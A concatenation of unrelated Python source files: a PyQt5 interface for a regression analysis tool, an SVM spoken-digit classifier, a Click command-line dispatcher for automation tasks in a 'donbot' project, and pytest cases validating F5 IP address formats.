"QColumnView {\n"
" background-color: #FFFFFF;\n"
" border: 1.5px solid #DCDCDC;\n"
" color: #000000;\n"
" gridline-color: #F0F0F0;\n"
" border-radius: 4px;\n"
"}\n"
"\n"
"QListView:hover,\n"
"QTreeView::hover,\n"
"QTableView::hover,\n"
"QColumnView::hover {\n"
" background-color: #FFFFFF;\n"
" border: 1px solid #0078D7;\n"
"}\n"
"\n"
"\n"
"QHeaderView {\n"
" background-color: #E1E1E1;\n"
" border: 0px transparent #E1E1E1;\n"
" padding: 0px;\n"
" margin: 0px;\n"
" border-radius: 0px;\n"
"}\n"
"\n"
"\n"
"QHeaderView::section {\n"
" background-color: #E1E1E1;\n"
" color: #000000;\n"
" padding: 2px;\n"
" border-radius: 0px;\n"
" text-align: left;\n"
"}\n"
"\n"
"QHeaderView::section:checked {\n"
" color: #000000;\n"
" background-color: #BCDCF4;\n"
"}\n"
"\n"
"\n"
"QHeaderView::section::vertical::first,\n"
"QHeaderView::section::vertical::only-one {\n"
" border-top: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::vertical {\n"
" border-top: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::horizontal::first,\n"
"QHeaderView::section::horizontal::only-one {\n"
" border-left: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QHeaderView::section::horizontal {\n"
" border-left: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QScrollBar:vertical {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
"}\n"
"\n"
"QScrollBar:horizontal {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
"}")
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(10, 70, 991, 611))
self.tabWidget.setStyleSheet("")
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.progressBar_1 = QtWidgets.QProgressBar(self.tab)
self.progressBar_1.setGeometry(QtCore.QRect(290, 230, 118, 23))
self.progressBar_1.setStyleSheet("")
self.progressBar_1.setProperty("value", 0)
self.progressBar_1.setObjectName("progressBar_1")
self.pushButton_2 = QtWidgets.QPushButton(self.tab)
self.pushButton_2.setGeometry(QtCore.QRect(20, 230, 75, 23))
self.pushButton_2.setStyleSheet("")
self.pushButton_2.setObjectName("pushButton_2")
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setGeometry(QtCore.QRect(10, 0, 401, 221))
self.groupBox.setStyleSheet("")
self.groupBox.setObjectName("groupBox")
self.label_1 = QtWidgets.QLabel(self.groupBox)
self.label_1.setGeometry(QtCore.QRect(20, 30, 141, 21))
self.label_1.setObjectName("label_1")
self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_2.setGeometry(QtCore.QRect(10, 90, 381, 121))
self.groupBox_2.setStyleSheet("")
self.groupBox_2.setObjectName("groupBox_2")
self.radioButton_1 = QtWidgets.QRadioButton(self.groupBox_2)
self.radioButton_1.setGeometry(QtCore.QRect(20, 30, 221, 17))
self.radioButton_1.setStyleSheet("")
self.radioButton_1.setObjectName("radioButton_1")
self.radioButton_2 = QtWidgets.QRadioButton(self.groupBox_2)
self.radioButton_2.setGeometry(QtCore.QRect(20, 60, 221, 17))
self.radioButton_2.setStyleSheet("")
self.radioButton_2.setObjectName("radioButton_2")
self.radioButton_3 = QtWidgets.QRadioButton(self.groupBox_2)
self.radioButton_3.setGeometry(QtCore.QRect(20, 90, 231, 17))
self.radioButton_3.setObjectName("radioButton_3")
self.label_2 = QtWidgets.QLabel(self.groupBox)
self.label_2.setGeometry(QtCore.QRect(20, 60, 131, 21))
self.label_2.setObjectName("label_2")
self.groupBox_3 = QtWidgets.QGroupBox(self.tab)
self.groupBox_3.setGeometry(QtCore.QRect(430, 0, 541, 61))
self.groupBox_3.setStyleSheet("")
self.groupBox_3.setObjectName("groupBox_3")
self.lineEdit_2 = QtWidgets.QLineEdit(self.groupBox_3)
self.lineEdit_2.setGeometry(QtCore.QRect(100, 30, 81, 20))
self.lineEdit_2.setStyleSheet("")
self.lineEdit_2.setReadOnly(True)
self.lineEdit_2.setObjectName("lineEdit_2")
self.lineEdit = QtWidgets.QLineEdit(self.groupBox_3)
self.lineEdit.setGeometry(QtCore.QRect(300, 30, 113, 20))
self.lineEdit.setStyleSheet("")
self.lineEdit.setReadOnly(True)
self.lineEdit.setObjectName("lineEdit")
self.label = QtWidgets.QLabel(self.groupBox_3)
self.label.setGeometry(QtCore.QRect(20, 30, 71, 21))
self.label.setObjectName("label")
self.label_8 = QtWidgets.QLabel(self.groupBox_3)
self.label_8.setGeometry(QtCore.QRect(240, 30, 51, 21))
self.label_8.setObjectName("label_8")
self.groupBox_8 = QtWidgets.QGroupBox(self.tab)
self.groupBox_8.setGeometry(QtCore.QRect(10, 260, 401, 281))
self.groupBox_8.setStyleSheet("")
self.groupBox_8.setObjectName("groupBox_8")
self.graphicsView_1 = MplWidget(self.groupBox_8)
self.graphicsView_1.setGeometry(QtCore.QRect(0, 20, 401, 261))
self.graphicsView_1.setStyleSheet("background-color: #F7FBFD")
self.graphicsView_1.setObjectName("graphicsView_1")
self.groupBox_9 = QtWidgets.QGroupBox(self.tab)
self.groupBox_9.setGeometry(QtCore.QRect(430, 70, 541, 471))
self.groupBox_9.setStyleSheet("")
self.groupBox_9.setObjectName("groupBox_9")
self.tableView_1 = QtWidgets.QTableView(self.groupBox_9)
self.tableView_1.setGeometry(QtCore.QRect(10, 30, 521, 431))
self.tableView_1.setStyleSheet("")
self.tableView_1.setObjectName("tableView_1")
self.dateEdit_1 = QtWidgets.QDateEdit(self.tab)
self.dateEdit_1.setGeometry(QtCore.QRect(170, 30, 91, 22))
self.dateEdit_1.setStyleSheet("")
self.dateEdit_1.setCalendarPopup(True)
self.dateEdit_1.setObjectName("dateEdit_1")
self.dateEdit_2 = QtWidgets.QDateEdit(self.tab)
self.dateEdit_2.setGeometry(QtCore.QRect(170, 60, 91, 22))
self.dateEdit_2.setStyleSheet("")
self.dateEdit_2.setCalendarPopup(True)
self.dateEdit_2.setObjectName("dateEdit_2")
self.progressBar_1.raise_()
self.pushButton_2.raise_()
self.groupBox.raise_()
self.groupBox_3.raise_()
self.groupBox_9.raise_()
self.dateEdit_1.raise_()
self.dateEdit_2.raise_()
self.groupBox_8.raise_()
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.progressBar_2 = QtWidgets.QProgressBar(self.tab_2)
self.progressBar_2.setGeometry(QtCore.QRect(290, 230, 118, 23))
self.progressBar_2.setStyleSheet("")
self.progressBar_2.setMaximum(100)
self.progressBar_2.setProperty("value", 0)
self.progressBar_2.setObjectName("progressBar_2")
self.groupBox_4 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_4.setGeometry(QtCore.QRect(10, 0, 401, 221))
self.groupBox_4.setStyleSheet("")
self.groupBox_4.setObjectName("groupBox_4")
self.label_3 = QtWidgets.QLabel(self.groupBox_4)
self.label_3.setGeometry(QtCore.QRect(20, 30, 161, 21))
self.label_3.setObjectName("label_3")
self.lineEdit_3 = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_3.setGeometry(QtCore.QRect(180, 30, 31, 20))
self.lineEdit_3.setStyleSheet("")
self.lineEdit_3.setObjectName("lineEdit_3")
self.label_4 = QtWidgets.QLabel(self.groupBox_4)
self.label_4.setGeometry(QtCore.QRect(20, 60, 161, 20))
self.label_4.setObjectName("label_4")
self.lineEdit_4 = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_4.setGeometry(QtCore.QRect(180, 60, 31, 20))
self.lineEdit_4.setStyleSheet("")
self.lineEdit_4.setObjectName("lineEdit_4")
self.groupBox_6 = QtWidgets.QGroupBox(self.groupBox_4)
self.groupBox_6.setGeometry(QtCore.QRect(10, 90, 381, 121))
self.groupBox_6.setObjectName("groupBox_6")
self.radioButton_4 = QtWidgets.QRadioButton(self.groupBox_6)
self.radioButton_4.setGeometry(QtCore.QRect(20, 35, 21, 21))
self.radioButton_4.setText("")
self.radioButton_4.setObjectName("radioButton_4")
self.radioButton_5 = QtWidgets.QRadioButton(self.groupBox_6)
self.radioButton_5.setGeometry(QtCore.QRect(20, 80, 21, 21))
self.radioButton_5.setText("")
self.radioButton_5.setObjectName("radioButton_5")
self.label_6 = QtWidgets.QLabel(self.groupBox_6)
self.label_6.setGeometry(QtCore.QRect(40, 42, 161, 21))
self.label_6.setObjectName("label_6")
self.label_14 = QtWidgets.QLabel(self.groupBox_6)
self.label_14.setGeometry(QtCore.QRect(40, 87, 321, 21))
self.label_14.setObjectName("label_14")
self.label_5 = QtWidgets.QLabel(self.groupBox_6)
self.label_5.setGeometry(QtCore.QRect(40, 28, 171, 21))
self.label_5.setObjectName("label_5")
self.label_9 = QtWidgets.QLabel(self.groupBox_6)
self.label_9.setGeometry(QtCore.QRect(40, 73, 161, 20))
self.label_9.setObjectName("label_9")
self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)
self.pushButton_3.setGeometry(QtCore.QRect(20, 230, 75, 23))
self.pushButton_3.setStyleSheet("")
self.pushButton_3.setObjectName("pushButton_3")
self.groupBox_5 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_5.setGeometry(QtCore.QRect(430, 0, 541, 61))
self.groupBox_5.setStyleSheet("")
self.groupBox_5.setObjectName("groupBox_5")
self.label_7 = QtWidgets.QLabel(self.groupBox_5)
self.label_7.setGeometry(QtCore.QRect(20, 30, 151, 21))
self.label_7.setObjectName("label_7")
self.lineEdit_5 = QtWidgets.QLineEdit(self.groupBox_5)
self.lineEdit_5.setGeometry(QtCore.QRect(180, 30, 31, 20))
self.lineEdit_5.setStyleSheet("")
self.lineEdit_5.setReadOnly(True)
self.lineEdit_5.setObjectName("lineEdit_5")
self.label_16 = QtWidgets.QLabel(self.groupBox_5)
self.label_16.setGeometry(QtCore.QRect(270, 30, 81, 21))
self.label_16.setObjectName("label_16")
self.lineEdit_6 = QtWidgets.QLineEdit(self.groupBox_5)
self.lineEdit_6.setGeometry(QtCore.QRect(360, 30, 81, 20))
self.lineEdit_6.setStyleSheet("")
self.lineEdit_6.setReadOnly(True)
self.lineEdit_6.setObjectName("lineEdit_6")
self.graphicsView_2 = MplWidget(self.tab_2)
self.graphicsView_2.setGeometry(QtCore.QRect(10, 280, 401, 261))
self.graphicsView_2.setStyleSheet("background-color: #F7FBFD")
self.graphicsView_2.setObjectName("graphicsView_2")
self.pushButton_4 = QtWidgets.QPushButton(self.tab_2)
self.pushButton_4.setGeometry(QtCore.QRect(880, 550, 75, 23))
self.pushButton_4.setStyleSheet("")
self.pushButton_4.setObjectName("pushButton_4")
self.groupBox_10 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_10.setGeometry(QtCore.QRect(10, 260, 401, 281))
self.groupBox_10.setStyleSheet("")
self.groupBox_10.setObjectName("groupBox_10")
self.groupBox_11 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_11.setGeometry(QtCore.QRect(430, 70, 541, 471))
self.groupBox_11.setStyleSheet("")
self.groupBox_11.setObjectName("groupBox_11")
self.groupBox_12 = QtWidgets.QGroupBox(self.groupBox_11)
self.groupBox_12.setGeometry(QtCore.QRect(10, 20, 221, 261))
self.groupBox_12.setStyleSheet("\n"
"QGroupBox {\n"
" font-weight: bold;\n"
" border: 0px solid #DCDCDC;\n"
" }\n"
"")
self.groupBox_12.setObjectName("groupBox_12")
self.tableView_2 = QtWidgets.QTableView(self.groupBox_12)
self.tableView_2.setGeometry(QtCore.QRect(10, 30, 201, 221))
self.tableView_2.setStyleSheet("")
self.tableView_2.setObjectName("tableView_2")
self.groupBox_13 = QtWidgets.QGroupBox(self.groupBox_11)
self.groupBox_13.setGeometry(QtCore.QRect(240, 20, 291, 261))
self.groupBox_13.setStyleSheet("\n"
"QGroupBox {\n"
" font-weight: bold;\n"
" border: 0px solid #DCDCDC;\n"
" }\n"
"")
self.groupBox_13.setObjectName("groupBox_13")
self.tableView_4 = QtWidgets.QTableView(self.groupBox_13)
self.tableView_4.setGeometry(QtCore.QRect(10, 30, 271, 221))
self.tableView_4.setStyleSheet("")
self.tableView_4.setObjectName("tableView_4")
self.groupBox_14 = QtWidgets.QGroupBox(self.groupBox_11)
self.groupBox_14.setGeometry(QtCore.QRect(10, 280, 521, 181))
self.groupBox_14.setStyleSheet("\n"
"QGroupBox {\n"
" font-weight: bold;\n"
" border: 0px solid #DCDCDC;\n"
" }\n"
"")
self.groupBox_14.setObjectName("groupBox_14")
self.tableView_3 = QtWidgets.QTableView(self.groupBox_14)
self.tableView_3.setGeometry(QtCore.QRect(10, 30, 501, 141))
self.tableView_3.setStyleSheet("")
self.tableView_3.setObjectName("tableView_3")
self.groupBox_13.raise_()
self.groupBox_12.raise_()
self.groupBox_14.raise_()
self.groupBox_11.raise_()
self.groupBox_10.raise_()
self.progressBar_2.raise_()
self.groupBox_4.raise_()
self.pushButton_3.raise_()
self.groupBox_5.raise_()
self.graphicsView_2.raise_()
self.pushButton_4.raise_()
self.tabWidget.addTab(self.tab_2, "")
self.groupBox_7 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_7.setGeometry(QtCore.QRect(10, 0, 991, 61))
self.groupBox_7.setStyleSheet("")
self.groupBox_7.setObjectName("groupBox_7")
self.pushButton_1 = QtWidgets.QPushButton(self.groupBox_7)
self.pushButton_1.setGeometry(QtCore.QRect(10, 30, 75, 23))
self.pushButton_1.setStyleSheet("/* QPushButton -------------------------------------------------------------- */\n"
"\n"
"QPushButton {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"QPushButton:hover,\n"
"QPushButton:checked:hover{\n"
" border: 1px solid #0078D7;\n"
" background-color: #E5F1FB;\n"
" color: #000000;\n"
"}\n"
"\n"
"QPushButton:pressed {\n"
" background-color: #CCE4F7;\n"
" border: 1px solid #00559B;\n"
" color: #000000;\n"
"}")
self.pushButton_1.setObjectName("pushButton_1")
self.lineEdit_1 = QtWidgets.QLineEdit(self.groupBox_7)
self.lineEdit_1.setGeometry(QtCore.QRect(90, 30, 301, 21))
self.lineEdit_1.setStyleSheet("QLineEdit {\n"
" background-color: #FFFFFF;\n"
" border-style: solid; /* without this border reverts for disabled */\n"
" border: 1px solid #7A7A7A;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"QLineEdit:hover{\n"
" border: 1px solid #000000;\n"
" background-color: #FFFFFF;\n"
" color: #000000;\n"
"}\n"
"")
self.lineEdit_1.setReadOnly(True)
self.lineEdit_1.setObjectName("lineEdit_1")
self.checkBox_1 = QtWidgets.QCheckBox(self.groupBox_7)
self.checkBox_1.setGeometry(QtCore.QRect(580, 30, 91, 17))
self.checkBox_1.setStyleSheet("border: none\n"
"")
self.checkBox_1.setObjectName("checkBox_1")
self.comboBox_1 = QtWidgets.QComboBox(self.groupBox_7)
self.comboBox_1.setGeometry(QtCore.QRect(420, 28, 131, 22))
self.comboBox_1.setStyleSheet("")
self.comboBox_1.setObjectName("comboBox_1")
self.comboBox_1.addItem("")
self.comboBox_1.addItem("")
self.comboBox_1.addItem("")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1011, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.tabWidget, self.pushButton_1)
MainWindow.setTabOrder(self.pushButton_1, self.lineEdit_1)
MainWindow.setTabOrder(self.lineEdit_1, self.dateEdit_1)
MainWindow.setTabOrder(self.dateEdit_1, self.dateEdit_2)
MainWindow.setTabOrder(self.dateEdit_2, self.radioButton_1)
MainWindow.setTabOrder(self.radioButton_1, self.radioButton_2)
MainWindow.setTabOrder(self.radioButton_2, self.radioButton_3)
MainWindow.setTabOrder(self.radioButton_3, self.pushButton_2)
MainWindow.setTabOrder(self.pushButton_2, self.lineEdit_2)
MainWindow.setTabOrder(self.lineEdit_2, self.tableView_1)
MainWindow.setTabOrder(self.tableView_1, self.radioButton_5)
MainWindow.setTabOrder(self.radioButton_5, self.radioButton_4)
MainWindow.setTabOrder(self.radioButton_4, self.lineEdit_5)
MainWindow.setTabOrder(self.lineEdit_5, self.tableView_2)
MainWindow.setTabOrder(self.tableView_2, self.lineEdit_3)
MainWindow.setTabOrder(self.lineEdit_3, self.pushButton_3)
MainWindow.setTabOrder(self.pushButton_3, self.pushButton_4)
MainWindow.setTabOrder(self.pushButton_4, self.lineEdit_4)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Methodologies DP&R"))
self.pushButton_2.setText(_translate("MainWindow", "Calculate"))
self.groupBox.setTitle(_translate("MainWindow", "Inputs"))
self.label_1.setText(_translate("MainWindow", "Service Date Range Begin:"))
self.groupBox_2.setTitle(_translate("MainWindow", "Date of Intervention (DOI) Optimization Options"))
self.radioButton_1.setText(_translate("MainWindow", "Maximize 1 month prior to DOI"))
self.radioButton_2.setText(_translate("MainWindow", "Maximize 1 month difference after DOI"))
self.radioButton_3.setText(_translate("MainWindow", "Maximize 12 month difference after DOI"))
self.label_2.setText(_translate("MainWindow", "Service Date Range End:"))
self.groupBox_3.setTitle(_translate("MainWindow", "Outputs"))
self.label.setText(_translate("MainWindow", "Optimal DOI:"))
self.label_8.setText(_translate("MainWindow", "Amount:"))
self.groupBox_8.setTitle(_translate("MainWindow", "Chart"))
self.groupBox_9.setTitle(_translate("MainWindow", "Table"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", " Data Points "))
self.groupBox_4.setTitle(_translate("MainWindow", "Inputs"))
self.label_3.setText(_translate("MainWindow", "Maximum Number of Segments:"))
self.label_4.setText(_translate("MainWindow", "Maximum Number of Iterations:"))
self.groupBox_6.setTitle(_translate("MainWindow", "Explanatory Variable (Time) Recode Options"))
self.label_6.setText(_translate("MainWindow", "All independent variables vary"))
self.label_14.setText(_translate("MainWindow", "One independent variable varies while all others held constant"))
self.label_5.setText(_translate("MainWindow", "Continuous without Discretization"))
self.label_9.setText(_translate("MainWindow", "Continuous with Discretization"))
self.pushButton_3.setText(_translate("MainWindow", "Calculate"))
self.groupBox_5.setTitle(_translate("MainWindow", "Outputs"))
self.label_7.setText(_translate("MainWindow", "Optimal Number of Segments:"))
self.label_16.setText(_translate("MainWindow", "Function value:"))
self.pushButton_4.setText(_translate("MainWindow", "Export"))
self.groupBox_10.setTitle(_translate("MainWindow", "Chart"))
self.groupBox_11.setTitle(_translate("MainWindow", "Tables"))
self.groupBox_12.setTitle(_translate("MainWindow", "Summary"))
self.groupBox_13.setTitle(_translate("MainWindow", "Parameters"))
self.groupBox_14.setTitle(_translate("MainWindow", "ANOVA"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", " Regression "))
self.groupBox_7.setTitle(_translate("MainWindow", "Data"))
self.pushButton_1.setText(_translate("MainWindow", "Select File"))
self.checkBox_1.setText(_translate("MainWindow", "Has Headers"))
self.comboBox_1.setItemText(0, _translate("MainWindow", "Tab Delimited"))
self.comboBox_1.setItemText(1, _translate("MainWindow", "Comma Delimited"))
self.comboBox_1.setItemText(2, _translate("MainWindow", "Pipe Delimited"))
from mplwidget import MplWidget
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
<reponame>Bot-Ro-Bot/Parsing-Audio-Data<gh_stars>0
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import wavfile
from scipy import fftpack
from scipy import signal
from scipy.stats import zscore
import os
from sklearn import svm
# import soundfile as sf
#import pyAudioAnalysis
#module to output the sound
from playsound import playsound
#metadata is a python file which contains a dictoinary of all the speakers and their detals
# import metadata
"""
lets assume the users are tagged the following indices:
Speaker 0 : jackson
Speaker 1 : nicolas
Speaker 2 : theo
Speaker 3 : yweweler
"""
#length of all sample is 1 seconds approx
sample_length = 1 #in seconds
samples = [] ; sample_rate = []
#name of the folder containing the samples
dataset_folder = "recordings"
current_dir = os.listdir()
main_dir = os.getcwd()
os.chdir(current_dir[current_dir.index(dataset_folder)])
sample_dir = os.getcwd()
all_samples = os.listdir()
# all_samples.sort()
print((all_samples[2]))
def extract_labels(all_samples):
"""
this function extracts the labels and speaker from the dataset
"""
labels = []
speakers = []
print("Extracting Labels")
for i in range(len(all_samples)):
temp = all_samples[i]
temp = (temp[0:-3].split("_"))
labels.append(float(temp[0]))
speakers.append(temp[1])
if i%16==0:
print("-",end="")
print("\nLabels Extracted\n")
return np.array(labels),np.array(speakers)
def import_data(all_samples):
"""
this function imports all the wave files in dataset
"""
samples = []
sample_rate = []
print("Loading Dataset")
for i in range(len(all_samples)):
s_len, s = wavfile.read(all_samples[i])
samples.append(s);
sample_rate.append(s_len)
if i%16==0:
print("-",end="")
print("\nDataset Loaded\n")
return np.array(samples),sample_rate
def normalize_data(samples):
return [zscore(sample) for sample in samples]
def zero_padding(samples):
"""
this function pads the samples to make every sample the equal length
it cuts off excess values and addes zeros to the insufficient ones
making the length a power of 2 makes the calculation of fft faster and convinient
"""
for i in range(len(samples)):
length = len(samples[i])
diff = int(abs(4096-length) / 2)
diff = abs(4096-length)
pad0 = int(diff/2)
pad1 = diff-pad0
if(length == 4096):
continue
elif(length < 4096):
samples[i] = np.pad(samples[i],(pad0,pad1))
else:
#chopping the signals with higher number of datas
samples[i] = samples[i][pad0:-pad1]
return samples
def train_test_split(samples , labels):
#do a 75:25 split of data into training and testing data
margin = int(0.75*len(samples))
train_data = samples[:margin]
train_label = labels[:margin]
test_data = samples[margin:]
test_label = labels[margin:]
return train_data,train_label,test_data,test_label
samples,sample_rate = import_data(all_samples)
# print(samples)
labels, speakers = extract_labels(all_samples)
# samples = zero_padding(samples)
samples = zero_padding(samples)
samples = normalize_data(samples)
# print(samples)
train_data , train_label, test_data ,test_label = train_test_split(samples, labels)
# print(train_data.shape, train_label.shape, test_data.shape, test_label.shape)
# print(train_data.flatten())
clf = svm.SVC()
clf.fit(train_data,train_label)
# pred = (clf.predict([test_data[10]]))
pred = (clf.predict(test_data))
# print(pred)
points = 0
for i in range(len(pred)):
print(int(pred[i]),test_label[i])
if ( int(pred[i]) == int(test_label[i]) ):
points+=1
print("Accuracy : ", ( (points/ len(pred)) * 100))
# print("Value should be :", test_label[10]) |
<reponame>zhiiker/donbot
import time
import click
from utils.utils import get_config
NOINPUT = 'noinput'
class MyIntParamType(click.ParamType):
name = 'myinteger'
def convert(self, value, param, ctx):
if value in (NOINPUT, ):
return NOINPUT
try:
return int(value)
except (ValueError, UnicodeError):
self.fail('%s is not a valid integer' % value, param, ctx)
def __repr__(self):
return 'MYINT'
class MyBoolParamType(click.ParamType):
name = 'myboolean'
def convert(self, value, param, ctx):
if isinstance(value, bool):
return bool(value)
value = value.lower()
if value in ('true', 't', '1', 'yes', 'y'):
return True
elif value in ('false', 'f', '0', 'no', 'n'):
return False
elif value in (NOINPUT, ):
return NOINPUT
self.fail('%s is not a valid boolean' % value, param, ctx)
def __repr__(self):
return 'MYBOOL'
MYINT = MyIntParamType()
MYBOOL = MyBoolParamType()
def get_config_value(value, key, config, _default=None, default=NOINPUT):
if value != default:
value = value
else:
_value = None
if config.get('args'):
_value = config['args'].get(key)
if _value is None or _value == '':
value = _default
else:
value = _value
return value
@click.command()
@click.option('-t', '--task', default=None)
@click.option('-c', '--config', help='config format file, num or file#num')
@click.option('-a', '--auto', type=MYBOOL, default=NOINPUT)
@click.option('-d', '--duration', type=MYINT, default=NOINPUT)
@click.option('-w', '--wait', type=MYINT, default=NOINPUT)
@click.option('-m', '--max_click', type=MYINT, default=NOINPUT)
@click.option('-e', '--skip', default=NOINPUT)
@click.option('-q', '--close', type=MYBOOL, default=NOINPUT)
@click.option('-p', '--cashout', type=MYBOOL, default=NOINPUT)
@click.option('-s', '--solo', type=MYBOOL, default=NOINPUT)
@click.option('-b', '--cron', type=MYBOOL, default=NOINPUT)
def cli(task, config, auto, duration, wait, max_click, skip, close, cashout, solo, cron):
config = get_config(config=config)
if task is None:
task = config.get('task')
while True:
try:
if task == 'empty':
from apps.empty import EmptyTask
e = EmptyTask(config=config)
e.run()
elif task == 'koinme':
from apps.koinme import Koinme
auto = get_config_value(auto, 'auto', config, _default=False)
k = Koinme(config=config)
k.koinme(auto=auto)
elif task == 'ameb':
from apps.ameb import Ameb
cron = get_config_value(cron, 'cron', config, _default=False)
duration = get_config_value(duration, 'duration', config, _default=None)
wait = get_config_value(wait, 'wait', config, _default=None)
a = Ameb(config=config)
a.ameb(cron=cron, duration=duration, wait=wait)
elif task == 'am_emu':
from apps.ameb import Ameb
max_click = get_config_value(max_click, 'max_click', config, _default=None)
duration = get_config_value(duration, 'duration', config, _default=None)
skip = get_config_value(skip, 'skip', config, _default=None)
close = get_config_value(close, 'close', config, _default=False)
cashout = get_config_value(cashout, 'cashout', config, _default=True)
a = Ameb(config=config)
a.am_emu(max_click=max_click, duration=duration, skip=skip, close=close, cashout=cashout)
elif task == 'eb_emu':
from apps.ameb import Ameb
solo = get_config_value(solo, 'solo', config, _default=True)
close = get_config_value(close, 'close', config, _default=False)
cron = get_config_value(cron, 'cron', config, _default=False)
duration = get_config_value(duration, 'duration', config, _default=None)
a = Ameb(config=config)
a.eb_emu(solo=solo, close=close, cron=cron, duration=duration)
elif task == 'ameb_emu':
from apps.ameb import Ameb
max_click = get_config_value(max_click, 'max_click', config, _default=None)
duration = get_config_value(duration, 'duration', config, _default=None)
skip = get_config_value(skip, 'skip', config, _default=None)
close = get_config_value(close, 'close', config, _default=False)
cashout = get_config_value(cashout, 'cashout', config, _default=False)
a = Ameb(config=config)
a.ameb_emu(max_click=max_click, duration=duration, skip=skip, close=close, cashout=cashout)
elif task == 'bing':
from apps.bing import BingTask
close = get_config_value(close, 'close', config, _default=True)
a = BingTask(config)
a.run(close=close)
except KeyboardInterrupt:
break
except Exception as e:
# print(e)
# raise
time.sleep(60 * 10)
if __name__ == '__main__':
cli()
|
<reponame>simonkowallik/as3ninja<filename>tests/test_types.py
# -*- coding: utf-8 -*-
import pytest
from as3ninja.types import F5IP, F5IPv4, F5IPv6
class Test_type_F5IPx:
test_params = [
# IP version, IP Address, Valid(True/False)
["ipv4", "192.168.0.1%123/32", True],
["ipv4", "192.168.0.1%123", True],
["ipv4", "192.168.0.1/32", True],
["ipv4", "0.0.0.0/0", True],
["ipv4", "0.0.0.0%123/0", True],
["ipv4", "9172.16.31.10%123/24", False], # wrong mask
["ipv4", "1.2.3.4%-1/32", False], # wrong rdid
["ipv4", "1.2.3.4%65536/32", False], # wrong rdid
["ipv4", "256.0.0.1", False], # wrong IPv4
["ipv4", "1.2.3.4/33", False], # wrong mask
["ipv4", "127.0.0.1", False], # loopback not allowed
["ipv4", "127.100.0.1", False], # loopback not allowed
[
"ipv4",
"169.254.0.1",
True,
], # link-local ok -> https://support.f5.com/csp/article/K13098
["ipv6", "2001:db9::%1/120", True],
["ipv6", "fc00:db20:35b:7399::5%1/128", True],
["ipv6", "fc00:db20:35b:7399::5%1", True],
["ipv6", "::%65534/0", True],
["ipv6", "2001:db8::", True],
["ipv6", "2001:DB8::", True], # uppercase IPv6
["ipv6", "::", True],
["ipv6", "a::g", False], # wrong IPv6
["ipv6", "200::cafe::1", False], # wrong IPv6
["ipv6", "fc00:db20:35b:7399::5/129", False], # wrong mask
["ipv6", "fc00:db20:35b:7399::5%ABC/cde", False], # wrong rdid + mask
["ipv6", "::1", False], # loopback not allowed
]
def test_input_type(self):
with pytest.raises(TypeError):
F5IP(int(123))
def test_schema_is_dict(self):
assert isinstance(F5IP.schema(), dict)
assert isinstance(F5IPv4.schema(), dict)
assert isinstance(F5IPv6.schema(), dict)
def test_schema_examples_IPAny(self):
for example_ip in F5IP.schema()["properties"]["f5ip"]["examples"]:
assert isinstance(F5IP(example_ip), F5IP)
def test_schema_examples_IPv4(self):
for example_ip in F5IPv4.schema()["properties"]["f5ip"]["examples"]:
assert isinstance(F5IPv4(example_ip), F5IPv4)
def test_schema_examples_IPv6(self):
for example_ip in F5IPv6.schema()["properties"]["f5ip"]["examples"]:
assert isinstance(F5IPv6(example_ip), F5IPv6)
def test_dunder_str(self):
model = F5IP("0.0.0.0")
assert model.__str__() == "F5IP('0.0.0.0')"
def test_dunder_repr(self):
model = F5IP("0.0.0.0")
assert model.__repr__() == "F5IP('0.0.0.0')"
@pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
def test_ipAny(self, ipv, test_ip, expected_result):
try:
model = F5IP(test_ip)
assert model.addr in repr(model)
assert model.mask in repr(model)
assert model.rdid in repr(model)
except ValueError:
assert expected_result is False
@pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
def test_ipv4(self, ipv, test_ip, expected_result):
if ipv == "ipv4":
try:
model = F5IPv4(test_ip)
assert model.addr in repr(model)
assert model.mask in repr(model)
assert model.rdid in repr(model)
